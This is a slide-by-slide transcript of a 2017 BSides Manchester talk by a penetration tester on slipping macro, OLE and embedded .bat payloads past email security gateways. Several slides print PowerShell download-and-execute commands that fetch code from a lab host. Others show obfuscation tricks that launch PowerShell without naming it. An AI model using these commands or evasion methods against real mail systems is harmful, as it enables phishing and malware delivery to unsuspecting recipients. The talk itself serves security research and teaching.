Recommended
Recommended
More Related Content
What's hot
What's hot (10)
Similar to How to bypass email gateways using common payloads... Bsides Manchester 2017
Similar to How to bypass email gateways using common payloads... Bsides Manchester 2017 (20)
Recently uploaded
Recently uploaded (20)
How to bypass email gateways using common payloads... Bsides Manchester 2017
- 2. Neil Lines - Pen Tester Involved in a wide range of security testing. Social Engineering (SE) is my favourite!
- 4. enemies of the west..
- 5. How to bypass email gateways using Common Payloads…
- 9. What is a Macro?
- 10. A macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically.
- 11. How can you use it?
- 12. Legitimate functionality can be used maliciously…
- 13. Macros can be used for remote access…
- 14. OLE payload
- 15. What is an OLE?
- 16. Object Linking and Embedding (OLE) is a proprietary technology developed by Microsoft that allows embedding and linking to documents and other objects.
- 17. How can you use it?
- 18. OLE can be used for remote access…
- 19. Recently A lot of talk about OLE Days been numbered
- 20. I will look at that later…
- 21. Both macro and ole require user input to trigger…
- 22. macro
- 23. OLE
- 24. OLE seem to be less common…
- 25. How can you create these payloads?
- 28. Lets have a demo…
- 29. Vid 1. Macro, OLE, UNC
- 31. I use these payloads
- 33. Cisco’s ironport
- 37. Are good at blocking ole and macro’s!
- 38. A Quick look At what mail gateways block…
- 40. Word macros
- 41. Ole payloads
- 42. They also block
- 43. Anything created by other Common framework
- 44. msf / unicorn
- 45. Cve-2017-0199
- 49. some environments just block all attachments
- 51. ?
- 54. Now the fun stuff…
- 55. 1st off they are all good products
- 56. Defence in depth you need them!
- 57. but how do they work?
- 58. They kind of work like AV…
- 59. Signatures…
- 60. Now they commonly say they don’t
- 61. Use Signatures…
- 62. How did I conclude
- 64. use signatures
- 65. I started looking at macros
- 66. Which I discovered is a bad place to start
- 68. And mail gateways great at spotting them
- 72. kddCLIsrlIJ = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e" & " "
- 73. If you delete
- 74. And then add the macro to word…
- 75. Deliver
- 76. It gets blocked
- 77. Same macro
- 78. Saved in excel
- 79. Gets delivered
- 82. different office documents = different results…
- 84. Lets Start by looking at a common ole email payload…
- 85. Object Linking and Embedding (OLE)
- 87. OLE commonly consists of an embedded windows shortcut…
- 90. C:Windowssystem32WindowsPo werShellv1.0powershell.exe -exec bypass -c "IEX (new-object system.net.webclient).downloadstri ng('http://192.168.1.8/payload')"
- 91. So do Common email gateway security appliances
- 92. Catch the above OLE payload?
- 94. So how can you get round this?
- 95. Remembering the appliances are signature based
- 96. Lets see what they appeared to detect…
- 97. C:Windowssystem32WindowsPo werShellv1.0powershell.exe -exec bypass -c "IEX (new-object system.net.webclient).downloadstri ng('http://192.168.1.8/payload')"
- 98. C:WindowsSystem32mspaint.exe -exec bypass -c "IEX (new-object system.net.webclient).downloadstri ng('http://192.168.1.8/payload')"
- 99. Save and email…
- 100. And wait 15 mins…
- 101. Delivered…
- 102. Win!
- 103. Back to research
- 104. So I download Symantec Email Security cloud Sales PDF
- 107. But if you swap A signature correlating word with a none correlating signature word your payload gets delivered?
- 108. Signature confusion
- 109. So what have we learned?
- 112. And what did I learn?
- 113. swapping PS with Mspaint Results in a?
- 114. payload that attempts to start mspaint
- 115. Get confused then close with an error
- 116. Pro Winning!
- 117. But it was a useful as a poc!
- 118. So lets relook
- 119. C:Windowssystem32WindowsPowe rShellv1.0powershell.exe -exec bypass -c powershell.exe -exec bypass -c
- 121. Still got caught…
- 122. So I called a friend
- 123. @scriptmonkey_
- 124. “I want to call PS without calling PS”
- 127. What the hell does that do?
- 128. Vid. 2
- 130. Great so we can now call PS on the sly…
- 131. But does it slip past the email gateways?
- 132. Make the shortcut for the OLE…
- 133. start %allusersprofile:~3,1%%allusersprofile:~5,1% %windir:~3,1%%localappdata:~5,2%%windir:~ 9,1%he%localappdata:~-1%%localappdata:~- 1% -exec bypass -c "IEX (new-object system.net.webclient).downloadstring('http:// 192.168.1.8/test')"
- 134. But the Shortcut Idea is a No go!
- 135. Who’s idea was it to set a
- 136. 260 character limit on shortcuts!
- 137. Like seriously
- 138. Your busy writing simulated malware
- 139. And someone slaps you right back!
- 140. an email proxy laughs at me
- 141. So shortcuts have limits…
- 142. Roll on the bat Chapter 2
- 143. But can you even email a .bat file?
- 144. Sending
- 146. Receiving
- 148. Outlook blocked access to the following potentially unsafe attachments…
- 149. No you cant directly email a .bat
- 150. But you can embedded one into an office document ;0)
- 151. And email that
- 152. Powerbat
- 154. How to embed it?
- 155. Initially I came up with the following horrid solution
- 156. Warning If you have any sense of style or pride in your work
- 157. Please look away
- 158. Vid 3 how not to embed
- 160. So I emailed it…
- 161. Via the email gateways
- 162. did it get delivered?
- 163. Delivered
- 164. So Was it the obfuscation?
- 165. So I retried with
- 166. C:Windowssystem32WindowsP owerShellv1.0powershell.exe - exec bypass -c "IEX (new-object system.net.webclient).downloadst ring('http://192.168.1.20/powersh ell_attack.txt')"
- 168. And I embedded it in the typical way
- 170. So no obfuscation
- 171. Only difference between this and a typical OLE
- 172. Shortcut replaced with a .bat
- 173. Sent
- 174. Delivered…
- 175. Same PowerShell request different medium gets through
- 176. 13 Jul 2017
- 178. 21 Jul 2017
- 180. Microsoft Office for Windows released in October 1990
- 181. Waits 27 years to block .bat files
- 182. And then does it 14 days after I discover
- 184. Coincidence? :0)
- 185. Tweets suggest office365 is now blocking OLE!
- 186. Blocks will filter down in Updates to all versions of Office…
- 187. Is The OLE dead?
- 188. I wanted to play so needed to update office
- 189. So how do you update Office?
- 190. Office 2010
- 193. You receive updates: Managed by your systems administrator
- 194. 2017 we still find missing ms08-067
- 195. Cynic in me thinks, update office?
- 196. Office 2010 still common Support ended oct 2015
- 197. So no updates!
- 198. So OLE is not dead!
- 199. So why does it happen… Chapter 3
- 200. I still think email gateways use signatures…
- 201. Look for typical, macros, OLE (shortcuts)…
- 202. And Either doesn’t think about.bat files or assumes outlook will blocks them…
- 203. Talks on AV bypass have taught me change the language
- 204. And things slip past…
- 205. Conclusion: My theory and practical experience was that AV vendors are looking at the templates rather than the shellcode itself. https://www.blackhillsinfosec.com/modifying- metasploit-x64-template-for-av-evasion/
- 206. Seems email proxies are the same!
- 207. Chapter 4 The final dance…
- 208. What is a .bat file?
- 210. lots of scripting languages
- 211. changing the language changes the template and Things slip past
- 212. Any questions
- 214. myexploit2600